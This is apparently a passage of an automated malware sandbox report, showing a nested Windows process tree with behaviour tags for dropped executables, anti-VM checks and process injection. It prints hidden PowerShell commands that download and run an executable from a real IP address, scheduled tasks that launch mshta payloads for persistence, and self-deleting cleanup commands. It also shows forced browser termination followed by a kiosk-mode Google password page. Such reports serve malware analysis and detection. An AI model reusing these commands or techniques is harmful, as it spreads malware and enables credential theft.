                                                                                                                                                                                                PID:30032
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 30032 -s 756
                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:7028
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 31380 -s 768
                                                                                                                                                                                                16⤵
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                PID:13328
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\fctj5" & exit
                                                                                                                                                                                            14⤵
                                                                                                                                                                                              PID:29556
                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                timeout /t 11
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:29516
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\FHCAEGCBFH.exe"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:6776
                                                                                                                                                                                        • C:\Users\Admin\FHCAEGCBFH.exe
                                                                                                                                                                                          "C:\Users\Admin\FHCAEGCBFH.exe"
                                                                                                                                                                                          12⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:8160
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                            13⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:3688
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\HJDGHIJDGC.exe"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:2384
                                                                                                                                                                                          • C:\Users\Admin\HJDGHIJDGC.exe
                                                                                                                                                                                            "C:\Users\Admin\HJDGHIJDGC.exe"
                                                                                                                                                                                            12⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:8816
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\EgYWrydD\mFNhvB3dN0vpMjQt.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\EgYWrydD\mFNhvB3dN0vpMjQt.exe 0
                                                                                                                                                                                              13⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:8772
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\EgYWrydD\Xm77gc7Fq5tj0Gig.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\EgYWrydD\Xm77gc7Fq5tj0Gig.exe 8772
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:10936
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 10936 -s 912
                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:22504
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 8772 -s 832
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                PID:22496
                                                                                                                                                                                    • C:\ProgramData\8qimg47gdb.exe
                                                                                                                                                                                      "C:\ProgramData\8qimg47gdb.exe"
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:7504
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\knfvgLfl\tQZHFFzWOTeRLhDF.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\knfvgLfl\tQZHFFzWOTeRLhDF.exe 0
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:7524
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\knfvgLfl\LtPSg8GWMANfxRIK.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\knfvgLfl\LtPSg8GWMANfxRIK.exe 7524
                                                                                                                                                                                          11⤵
                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:7564
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1792
                                                                                                                                                                                            12⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:25576
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\knfvgLfl\GwsRgtWs6zHurHtu.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\knfvgLfl\GwsRgtWs6zHurHtu.exe 7524
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:28412
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 28412 -s 840
                                                                                                                                                                                              12⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:32132
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 1712
                                                                                                                                                                                            11⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:3980
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\y5xtr" & exit
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:6504
                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                          timeout /t 11
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:5228
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:2020
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:4680
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:4952
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:6076
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:1396
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:1148
                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5980
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10030330101\7dac186a7c.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10030330101\7dac186a7c.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:5596
                                                                                                                                                                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:6520
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10030340101\242b1a64fe.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10030340101\242b1a64fe.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:3412
                                                                                                                                                                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:7064
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10030350101\8efbf83216.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10030350101\8efbf83216.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:21436
                                                                                                                                                                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2356
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10030360101\949ca901b0.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10030360101\949ca901b0.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:27788
                                                                                                                                                                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:23976
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:2372
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    PID:4688
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5168
                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                          timeout /t 5
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:5936
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10235690101\11bc511492.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10235690101\11bc511492.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                      PID:5224
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c schtasks /create /tn l9pQfmaizcm /tr "mshta C:\Users\Admin\AppData\Local\Temp\oaqmgOtAb.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:1452
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /create /tn l9pQfmaizcm /tr "mshta C:\Users\Admin\AppData\Local\Temp\oaqmgOtAb.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:4528
                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                        mshta C:\Users\Admin\AppData\Local\Temp\oaqmgOtAb.hta
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:2356
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YX0HFKXSENVYQCV5JYMOIPUZVTCOS6JA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:5144
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\TempYX0HFKXSENVYQCV5JYMOIPUZVTCOS6JA.EXE
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\TempYX0HFKXSENVYQCV5JYMOIPUZVTCOS6JA.EXE"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:1448
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10235700121\am_no.cmd" "
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:1796
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        timeout /t 2
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:6032
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:3540
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:4228
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2392
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:2164
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5228
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:3020
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /create /tn "Jr420majfFh" /tr "mshta \"C:\Temp\n3BpYCDjP.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:2536
                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                          mshta "C:\Temp\n3BpYCDjP.hta"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:4332
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:3544
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:3744
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10236210101\31ba7fd3b2.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10236210101\31ba7fd3b2.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:3192
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10236220101\765b593c88.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10236220101\765b593c88.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:4764
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\J2XHKBXU0RN0Z8LA1QQPEMJC.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\J2XHKBXU0RN0Z8LA1QQPEMJC.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          PID:2604
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10236230101\8156396751.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10236230101\8156396751.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:3712
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10236240101\2fdd058f6c.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10236240101\2fdd058f6c.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:5032
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /F /IM firefox.exe /T
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:2860
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /F /IM chrome.exe /T
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:4644
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /F /IM msedge.exe /T
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:1360
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /F /IM opera.exe /T
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:3440
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /F /IM brave.exe /T
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:6028
                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5300
                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Drops desktop.ini file(s)
                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:1668
                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
